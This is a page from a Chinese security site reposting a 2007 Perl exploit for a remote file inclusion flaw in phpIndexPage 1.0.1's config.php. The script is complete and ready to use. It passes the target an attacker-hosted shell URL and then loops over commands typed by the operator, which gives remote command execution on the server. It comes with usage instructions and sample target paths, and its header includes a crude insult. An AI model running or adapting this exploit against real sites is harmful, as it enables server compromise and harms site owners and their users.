首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
phpIndexPage <= 1.0.1 (config.php) Remote Inclusion Exploit
来源:DeltahackingTEAM 作者:Dr.Pantagon 发布时间:2007-01-22  

#!/usr/bin/perl

##########################################################################################################
# #
# phpindexpage 1.0 & 1.0.1 (config.php)Remote File Include Vulnerability #
# #
# Bug Found : DeltahackingTEAM discovery:Dr.Pantagon & Exploitet By Dr.Pantagon #
# #
# Class: Remote File Include Vulnerability #
# #
# exemplary Exp: http://www.site.com/config.php?env[inc_path]= #
# #
# Remote: Yes #
# #
# Type: Highly critical #
# #
# Vulnerable Code:include("$env[inc_path]/config.dist.php"); #
# #
# Download:http://heanet.dl.sourceforge.net/sourceforge/phpindexpage/phpindexpage-1.0.1.tgz #
# #
# Ptach : www.Advistory.deltasecurity.ir #
# #
# Bug Found : DeltahackingTEAM Exploitet Discovered & Exploitet: Dr.Pantagon<Dr.Pantagon[A]Gmail.com #
# #
# Exploit: phpindex.pl #
# #
# Web Site:www.deltasecurity.ir #
# #
#SP FUCK.............: z_zer0c00l(floozie Mother Test 100%=z_zer0c00l=misbegotten:D) #
##########################################################################################################

use LWP::UserAgent;
use LWP::Simple;

$target = @ARGV[0];
$shellsite = @ARGV[1];
$shellcmd = @ARGV[2];
$file = "config.php?env[inc_path]=";

if(!$target || !$shellsite)
{
usage();
}

header();

print "Type 'exit' to quit";
print "[cmd]\$";
$cmd = <STDIN>;

while ($cmd !~ "exit")
{
$xpl = LWP::UserAgent->new() or die;
$req = HTTP::Request->new(GET=>$target.$file.$shellsite.'?&'.$shellcmd.'='.$cmd) or die("\n\n Failed to connect.");
$res = $xpl->request($req);
$r = $res->content;
$r =~ tr/[\n]/[ê]/;

if (@ARGV[4] eq "-r")
{
print $r;
}
elsif (@ARGV[5] eq "-p")
{
# if not working change cmd variable to null and apply patch manually.
$cmd = "echo if(basename(__FILE__) == basename(\$_SERVER['PHP_SELF'])) die(); >> list_last.inc";
print q
{

}
}
else
{
print "[cmd]\$";
$cmd = <STDIN>;
}
}

sub header()
{
print q
{
#################################################################################
Only Str0ke
Bug Found : DeltahackingTEAM
phpindex.pl - Remote File Include Exploit
Vulnerability discovered and exploitet by Dr.Pantagon
Dr.Pantagon@Gmail.com
www.DeltaSecurity.ir
#################################################################################
};
}

sub usage()
{
header();
print q
{
########################################################################
Usage:
perl Yrch!.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
<Target Website> - Path to target eg: www.lashiyane.org
<Shell Location> - Path to shell eg: d4wood.by.ru/cmd.gif
<CMD Variable> - Shell command variable name eg: Pwd
<r> - Show output from shell
<p> - config.php
Example:
perl Axiom.pl http://localhost/include http://localhost/s.txt cmd -r -p
########################################################################
};
exit();
}

# Reza Yavari



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·GNU/Linux mbse-bbs <= 0.70.
·Apple iChat 3.1.6 v441 aim://
·phpBP <= RC3 (2.204) (sql/c
·Mac OS X 10.4.x Kernel shared_
·Mac OS X 10.4.8 SLP Daemon Ser
·Sun Microsystems Java GIF File
·BrowseDialog Class (ccrpbds6.d
·3Com TFTP Service <= 2.0.1
·迅雷5 ThunderAgent Module 远程
·Mafia Scum Tools 2.0.0 (index.
·Microsoft Help Workshop 4.03.0
·webSPELL 4.01.02 (gallery.php)
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved